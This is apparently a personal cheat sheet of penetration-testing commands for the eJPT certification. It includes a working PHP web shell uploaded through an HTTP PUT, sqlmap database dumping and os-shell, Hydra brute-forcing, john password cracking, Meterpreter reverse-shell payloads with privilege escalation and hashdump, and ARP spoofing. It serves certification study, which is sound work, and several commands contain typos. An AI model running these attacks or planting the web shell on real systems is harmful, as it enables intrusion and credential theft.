eJPT commands

This is a list of useful commands for the eJPT

Engagement -> Info gathering-> Footprinting & scanning -> Vuln Assessment -> exploitation -> Reporting

Information gathering -> footprinting & scanning

^ |

| | | / Explotation <-- Vuln assessment Add Route

ip route add ROUTETO via ROUTEFROM

ip route add 192.168.222.0/24 via 10.172.24.1       # Here 10.172.24.1 is the address of the gateway for subnet 192.168.222.0/24

Ping Sweep

Fping –a –g IPRANGE
nmap -sn 10.10.10.0/24

Vulnerability scanning with NMAP:

nmap –sV –script=vulnscan/vulnscan.nse target.site

Nmap scans:

nmap -sC -sV 10.10.10.10  // quick scan
nmap -sC -sV -p- 10.10.10.10 // Full scan
nmap -sU -sV 10.10.10.10    // UDP quick
nmap -Pn -O 10.10.10.10     // OS Detection

nmap -sV sC -T4 <ip> -oN out.nmap
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open

Web applications

nc -v www.abc.com 80        # After pressing enter you are prompted to send some dataType two lines given below and press enter two times to get http responseGET / HTTP/1.1Host: www.abc.com
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0

Opensl s_client –connect target.site:443
OPTIONS / HTTP/1.0

nc -v 10.10.10.10 port
HEAD / HTTP/1.0

httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt

nc 10.10.10.10 80
OPTIONS / HTPP/1.0

Cookies
Developer Tools, F12 in Chrome

wc –m webshell.php

nc 127.0.0.1 80
PUT /webshell.php HTTP/1.0
Content-type: text/html
Content-length: 149

Double Enter to Send

Webshell.php

<?php
if(isset($_GET[‘cmd’]))
{
	$cmd = $_GET[‘cmd’];
	Echo ‘<pre>Web Shell:</br>’;
	$result= shell_exec($cmd);
	echo $result;
              echo ‘</pre>’;
}
?>

Directory and File scanning

dirsearch.py -u http://10.10.10.10 -e *
gobuster dir -u 10.10.10.10 -w /path/to/wordlist.txt
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.1/admin -U admin -P admin

Cross Site Scripting (XSS):

Find a reflection point
Test with <i> tag
Test with HTML/JavaScript code (alert('XSS'))

SQLMap usage:

sqlmap -u http://10.10.10.10 -p parameter
sqlmap -u http://10.10.10.10  --data POSTstring -p parameter
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump

SQLMap - check for existence of SQL injection

Checking for existence of SQL injection
sqlmap -u ‘http://example.com/view.php?id=1141’ -p id       # GET Method

sqlmap -u ‘http://example.com/view.php’ --data <POST String> -p <parameter>     # POST Method

If vulnerable parameter found then you can proceed with extraction of data from database

sqlmap -u ‘http://example.com/view.php?id=1141’ --dbs     # Getting database names
sqlmap -u ‘http://example.com/view.php?id=1141’ -D <DB_name> --tables   # Getting table names
sqlmap -u ‘http://example.com/view.php?id=1141’ -D <db_name> -T <tbl_name> --columns    # Getting columns
sqlmap -u ‘http://example.com/view.php?id=1141’ -D <DB_name> -T <tbl_name> -C <column_name_comma_separate> --dump # To dump whole table remove column specification from the command and use only --dump option

Password attacks:

unshadow passwd shadow > crackfile
john –wordlist=<word list file> <file to crack>
john –wordlst=<word list file> -rules <file to crack>

Meterpreter: meterpreter is a shell that can run on any platforms after an exploit has been delivered:

Windows, Linux, java, php, python

search x
use x
info
show options, show advanced options
SET X (e.g. set RHOST 10.10.10.10, set payload x)

background
sessions -l
sessions -i 1
sysinfo, ifconfig, route, getuid
getsystem (privesc)
bypassuac
download x /root/
upload x C:\\Windows
shell
use post/windows/gather/hashdump

Windows
set payload windows/meterpreter/reverse_tcp
set paylog windows/meterpreter/bind_tcp

Java
set payload java/meterpreter/reverse_tcp
set payload java/meterpreter/bind_tcp

python
set payload python/meterpreter/reverse_tcp
set payload python/meterpreter/bind_tcp

Linux
set payload linux/x86/meterpreter/reverse_tcp
set payload linux/x86/meterpreter/bind_tcp

Php
set payload php/meterpreter/reverse_tcp

meterpreter> getsystem
background
search bypassuac
use exploit/windows/local/bypassuac
set session
exploit

use post/windows/gather/hashdump

Autoroute:
meterpreter> run autoroute -s <subnet>
meterpreter > run autoroute -p      # show active route table

msfvenom -p <payload_path> LHOST=<IP> LPORT=<PORT> -f <format> -o shell

Brute forcing with Hydra:

hydra –L users.txt –P pass.txt telnet://target.server
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22

hydra -l <username> -P <path to wordlist> <IP> ssh
hydra -L <path to username wordlist> -P <path to password wordlist> <IP> ssh

ARP spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11

Null sessions

nmblookup -A 10.10.10.10
smbclient -L //10.10.10.10 -N (list shares)
smbclient //10.10.10.10/share -N (mount share)
enum4linux -a 10.10.10.10

smbclient //ip/share -N

nmap -p445 --script=smb-vuln-* <IP> -v      # This will run all the smb-vuln scripts, if you want to run only few scripts then you can check other available scripts in /usr/share/nmap/scripts

Wireshark only GET / POST requests

http.request.method == GET / POST

SecLists

Apt-get install seclists

PreviousTomcat NextVPN

Last updated 3 years ago